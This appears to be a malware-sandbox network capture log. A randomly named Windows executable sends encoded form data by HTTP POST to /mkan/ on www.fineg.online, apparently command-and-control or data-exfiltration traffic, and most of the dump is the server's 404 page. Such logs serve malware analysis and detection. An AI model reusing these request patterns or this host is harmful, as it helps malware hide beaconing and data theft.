                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                        Sep 3, 2024 10:44:28.528060913 CEST224INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                        Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2
                        Sep 3, 2024 10:44:28.528069973 CEST1236INData Raw: 22 20 64 3d 22 4d 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 31 30 20 33 30 37 2e 36 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 39 2e 38 20 32 38 32 2e 34 68 2d 33 4c 32 30 20 33 30 37 2e
                        Data Ascii: " d="M19.8 282.4h-3L10 307.6h3z"/> <path class="st2" d="M29.8 282.4h-3L20 307.6h3z"/> <path class="st2" d="M39.8 282.4h-3L30 307.6h3z"/> <path class="st2" d="M49.8 282.4h-3L40 307.6h3z"/> <path class="st2" d="M59.8 282.4h-3L50
                        Sep 3, 2024 10:44:28.528111935 CEST1236INData Raw: 22 20 64 3d 22 4d 32 33 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 34 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38
                        Data Ascii: " d="M239.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M249.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M259.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M269.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M279.8 282
                        Sep 3, 2024 10:44:28.528124094 CEST1236INData Raw: 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 35 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34
                        Data Ascii: <path class="st2" d="M459.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M469.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M479.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M489.8 282.4h-3l-6.8 25.2h3z"/> <path class="
                        Sep 3, 2024 10:44:28.528135061 CEST1236INData Raw: 73 74 32 22 20 64 3d 22 4d 38 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 38 32 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20
                        Data Ascii: st2" d="M830 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M820 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M810 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M800 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M790 282.4h-3l-
                        Sep 3, 2024 10:44:28.528146029 CEST1236INData Raw: 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 36 30 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73
                        Data Ascii: 25.2h3z"/> <path class="st2" d="M600 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M590 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M580 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M570 282.4h-3l-6.8 25.2h3z"/> <path c
                        Sep 3, 2024 10:44:28.528156042 CEST552INData Raw: 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20
                        Data Ascii: -3l-6.8 25.2h3z"/> <path class="st2" d="M-330.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-320.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-310.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-300.2 282.4h-3l
                        Sep 3, 2024 10:44:28.528167009 CEST1236INData Raw: 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 34 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61
                        Data Ascii: h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-220.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-210.2 282.4h-3l-6.8 25.2h3z
                        Sep 3, 2024 10:44:28.528177977 CEST1236INData Raw: 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 33 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f
                        Data Ascii: 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-30.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-20.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-10.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-.2 282.4h-3l
                        Sep 3, 2024 10:44:28.533014059 CEST1236INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 33 32 30 20 32
                        Data Ascii: ath class="st2" d="M330 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M320 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M310 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M300 282.4h-3l-6.8 25.2h3z"/> <path class="st2"


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        10192.168.2.464988162.0.239.141804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:30.505765915 CEST732OUTPOST /mkan/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 219
                        Host: www.fineg.online
                        Origin: http://www.fineg.online
                        Referer: http://www.fineg.online/mkan/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 6f 57 34 4f 6d 69 4a 35 32 44 31 37 41 7a 4f 57 64 71 4d 6b 50 76 64 44 73 34 73 78 64 61 53 77 76 47 61 6f 49 2f 72 39 7a 48 43 57 4c 66 41 4a 32 75 64 78 45 6a 6f 46 64 34 68 64 65 61 65 44 35 74 4b 32 2f 68 42 35 69 67 42 7a 68 36 73 6b 67 30 4d 64 59 71 35 55 47 36 2b 74 6b 70 58 61 76 54 6f 6a 45 43 54 72 38 6d 33 71 66 6f 7a 50 79 59 65 4c 65 6b 57 65 4d 70 42 70 6a 4a 71 2f 53 42 38 49 58 64 39 6e 56 70 6c 77 31 54 48 70 63 49 34 46 4a 35 58 71 35 5a 48 2f 50 64 43 35 76 78 64 59 57 55 32 6b 49 58 47 43 42 75 4e 49 76 36 44 4e 65 52 48 77 63 35 4f 2b 34 57 69 70 66 49 37 41 2b 76 37 74 42 70 49 3d
                        Data Ascii: Qd=z8pzi1wICkJUoW4OmiJ52D17AzOWdqMkPvdDs4sxdaSwvGaoI/r9zHCWLfAJ2udxEjoFd4hdeaeD5tK2/hB5igBzh6skg0MdYq5UG6+tkpXavTojECTr8m3qfozPyYeLekWeMpBpjJq/SB8IXd9nVplw1THpcI4FJ5Xq5ZH/PdC5vxdYWU2kIXGCBuNIv6DNeRHwc5O+4WipfI7A+v7tBpI=
                        Sep 3, 2024 10:44:31.069830894 CEST1236INHTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:44:30 GMT
                        Server: Apache
                        Content-Length: 18121
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 275.2s54.7-28 117.5-28 128.6 28 128.6 28H377z"/> <path class="st0" d="M623.2 275.2s83.7-28 179.9-28 196.9 28 196.9 28H623.2z"/> <path class="st0" d="M-998 275.2s83.8-28 180 [TRUNCATED]
                        Sep 3, 2024 10:44:31.069844007 CEST1236INData Raw: 35 2d 32 38 20 31 32 38 2e 36 20 32 38 20 31 32 38 2e 36 20 32 38 48 2d 36 32 31 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 30 22 20 64 3d 22 4d 2d 33 37 34 2e 38 20 32 37 35 2e 32 73 38 33 2e 37 2d 32 38 20 31
                        Data Ascii: 5-28 128.6 28 128.6 28H-621z"/> <path class="st0" d="M-374.8 275.2s83.7-28 179.9-28S2 275.2 2 275.2h-376.8z"/> </g> </g> <g id="tracks"> <path class="st2" d="M9.8 282.4h-3L0 307.6h3z"/> <path class="st2" d="M19.8 282.4h-3
                        Sep 3, 2024 10:44:31.069849968 CEST1236INData Raw: 22 4d 31 39 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 30 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                        Data Ascii: "M199.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M209.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M219.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M229.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M239.8 282.4h-
                        Sep 3, 2024 10:44:31.069889069 CEST672INData Raw: 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 31 39 2e 38 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 32 39 2e 38
                        Data Ascii: ath class="st2" d="M419.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M429.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M439.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M449.8 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                        Sep 3, 2024 10:44:31.069899082 CEST1236INData Raw: 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 39 37 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d
                        Data Ascii: <path class="st2" d="M970 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M960 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M950 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M940 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                        Sep 3, 2024 10:44:31.069910049 CEST1236INData Raw: 4d 37 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 37 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22
                        Data Ascii: M750 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M740 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M730 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M720 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M710 282.4h-3l-6.8 25.2
                        Sep 3, 2024 10:44:31.069921017 CEST1236INData Raw: 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 34 36 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33
                        Data Ascii: 2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-460.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-450.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-440.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-430.2 2
                        Sep 3, 2024 10:44:31.069927931 CEST672INData Raw: 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 36 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 32 35
                        Data Ascii: th class="st2" d="M-260.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-250.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-240.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-230.2 282.4h-3l-6.8 25.2h3z"/> <path
                        Sep 3, 2024 10:44:31.069941998 CEST1236INData Raw: 32 22 20 64 3d 22 4d 2d 31 35 30 2e 32 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 2d 31 34 30 2e 32 20 32 38 32 2e 34 68 2d 33
                        Data Ascii: 2" d="M-150.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-140.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-130.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M-120.2 282.4h-3l-6.8 25.2h3z"/> <path class="st2"
                        Sep 3, 2024 10:44:31.069956064 CEST1236INData Raw: 64 3d 22 4d 34 35 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 34 34 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e
                        Data Ascii: d="M450 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M440 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M430 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M420 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M410 282.4h-
                        Sep 3, 2024 10:44:31.074789047 CEST1236INData Raw: 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 33 30 20 32 38 32 2e 34 68 2d 33 6c 2d 36 2e 38 20 32 35 2e 32 68 33 7a 22 2f 3e 0a 20 20 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 73 74 32 22 20 64 3d 22 4d 32 32 30
                        Data Ascii: <path class="st2" d="M230 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M220 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M210 282.4h-3l-6.8 25.2h3z"/> <path class="st2" d="M200 282.4h-3l-6.8 25.2h3z"/> <path class="st


                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                        11192.168.2.464989162.0.239.141804908C:\Program Files (x86)\kriceSuLBGYeQMtBcZYTxPMWHoYLFLSJwBQRiQERHPMTnZOuFKWwoqzcK\ftfqgrfncDSuar.exe
                        TimestampBytes transferredDirectionData
                        Sep 3, 2024 10:44:33.168747902 CEST10814OUTPOST /mkan/ HTTP/1.1
                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                        Accept-Encoding: gzip, deflate, br
                        Accept-Language: en-us
                        Connection: close
                        Content-Type: application/x-www-form-urlencoded
                        Cache-Control: max-age=0
                        Content-Length: 10299
                        Host: www.fineg.online
                        Origin: http://www.fineg.online
                        Referer: http://www.fineg.online/mkan/
                        User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2504.0 Safari/537.36
                        Data Raw: 51 64 3d 7a 38 70 7a 69 31 77 49 43 6b 4a 55 6f 57 34 4f 6d 69 4a 35 32 44 31 37 41 7a 4f 57 64 71 4d 6b 50 76 64 44 73 34 73 78 64 61 71 77 76 31 53 6f 4a 65 72 39 79 48 43 57 58 76 41 4d 32 75 64 6f 45 6a 77 42 64 34 73 69 65 59 6d 44 34 50 53 32 33 31 64 35 6f 67 42 7a 75 61 73 6c 39 6b 4d 79 59 72 49 64 47 36 75 74 6b 70 58 61 76 56 55 6a 47 58 76 72 2b 6d 33 72 59 6f 7a 54 35 34 65 6a 65 6b 2f 68 4d 70 55 4c 6a 34 4b 2f 54 6c 51 49 51 6f 52 6e 55 4a 6c 79 79 54 48 78 63 49 30 6b 4a 35 62 41 35 5a 7a 42 50 66 65 35 72 6e 6f 73 4d 58 6d 76 66 57 44 45 55 2b 6b 69 74 71 58 4c 62 68 4c 72 59 72 4f 63 76 43 36 39 48 4b 44 4f 74 39 6e 32 61 65 69 74 55 67 64 45 43 6e 73 37 38 36 35 7a 36 59 57 78 74 78 35 35 48 76 74 79 44 77 34 4d 59 35 5a 35 54 6f 37 4c 2b 50 6b 45 4f 56 2b 6d 61 6f 57 78 37 54 32 4e 4d 74 75 4a 49 6f 69 42 42 66 70 6d 68 31 77 6b 70 6e 33 43 38 38 37 45 74 45 71 30 6c 70 67 74 36 44 52 37 68 72 35 47 72 4f 39 6d 4a 39 43 53 68 53 45 67 54 7a 66 6b 2f 67 42 45 6a 47 43 79 63 72 63 [TRUNCATED]
                        Data Ascii: Qd=z8pzi1wICkJUoW4OmiJ52D17AzOWdqMkPvdDs4sxdaqwv1SoJer9yHCWXvAM2udoEjwBd4sieYmD4PS231d5ogBzuasl9kMyYrIdG6utkpXavVUjGXvr+m3rYozT54ejek/hMpULj4K/TlQIQoRnUJlyyTHxcI0kJ5bA5ZzBPfe5rnosMXmvfWDEU+kitqXLbhLrYrOcvC69HKDOt9n2aeitUgdECns7865z6YWxtx55HvtyDw4MY5Z5To7L+PkEOV+maoWx7T2NMtuJIoiBBfpmh1wkpn3C887EtEq0lpgt6DR7hr5GrO9mJ9CShSEgTzfk/gBEjGCycrcRaWbcQHUP/bmG+M/zo/cTjzEi87ynbpo/+fY/bM+zFVWaVQ8nOuoBPEE3EbLPgzL+WK5O03S00sP8kdHGt/iyZGx9E/Qfl9cM/Ms4BamAWQURDcWqLWEvb2dHESxVM8n41X/CJlT3d7q8pU7gGna6oFHyGzG4yYeoStuwDRLG7lp2ARZRUngzsU8ecACgJJzkUlJZJVIIdzLMKY0hN5fS+3RwBNRRe4ho5nML6sk1r9Qd36kM/hdcAdYbZJs6Gby++3VyOhVSRY2SlunG+38auC9RrUs6Y0T7EdKa8APrQqG31lAvk8JDyxYEmDajrHBGpsbJSh/5Mx/OI5Nu2PvSukaB04xoEbtAEDcbD+zzMYVocvdA3v7B5LIadsKCKQajCBT8EK65B5U4qteffjhhjG+fmpxiXleTKeVIPKjGiOKV1UHyAu2yIDXDoUecLfklpJoWVvwVAQWjwRLB++Zf60MfvC9n3oSShak+tyYsAuhVM+hAJ8ZauFeSKtPCvbLwJKlZ4KpNPAGfhTddPImpJUEOl2tafzfxl+YWiAcrbZz4ZsCoefLqCyA9IJGmX8gJji5enkUB0tOJrI5AN7aU4dvkSyP+p8wCzUGbBdifMn1BJTdJmSWLq5BgNa5jfbMkoyjGuqcCd1mZ8eJugRk6XYA/T45r9D1dd [TRUNCATED]
                        Sep 3, 2024 10:44:33.730403900 CEST1236INHTTP/1.1 404 Not Found
                        Date: Tue, 03 Sep 2024 08:44:33 GMT
                        Server: Apache
                        Content-Length: 18121
                        Connection: close
                        Content-Type: text/html
                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 34 30 34 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 20 20 3c 64 69 76 3e 0a 20 20 20 20 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 31 30 30 30 20 33 35 35 22 3e 0a 20 20 3c 67 20 69 64 3d 22 6f 63 65 61 6e 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 73 6b 79 22 20 63 6c 61 73 73 3d 22 73 74 30 22 [TRUNCATED]
                        Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <link rel="stylesheet" href="/404style.css"></head><body>... partial:index.partial.html --><div class="main"> <div> <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 1000 355"> <g id="ocean"> <path id="sky" class="st0" d="M0 0h1000v203.1H0z"/> <linearGradient id="water_1_" gradientUnits="userSpaceOnUse" x1="500" y1="354" x2="500" y2="200.667"> <stop offset="0" stop-color="#fff"/> <stop offset="1" stop-color="#b3dcdf"/> </linearGradient> <path id="water" fill="url(#water_1_)" d="M0 200.7h1000V354H0z"/> <path id="land" class="st0" d="M0 273.4h1000V354H0z"/> <g id="bumps"> <path class="st0" d="M0 275.2s83.8-28 180-28 197 28 197 28H0z"/> <path class="st0" d="M377 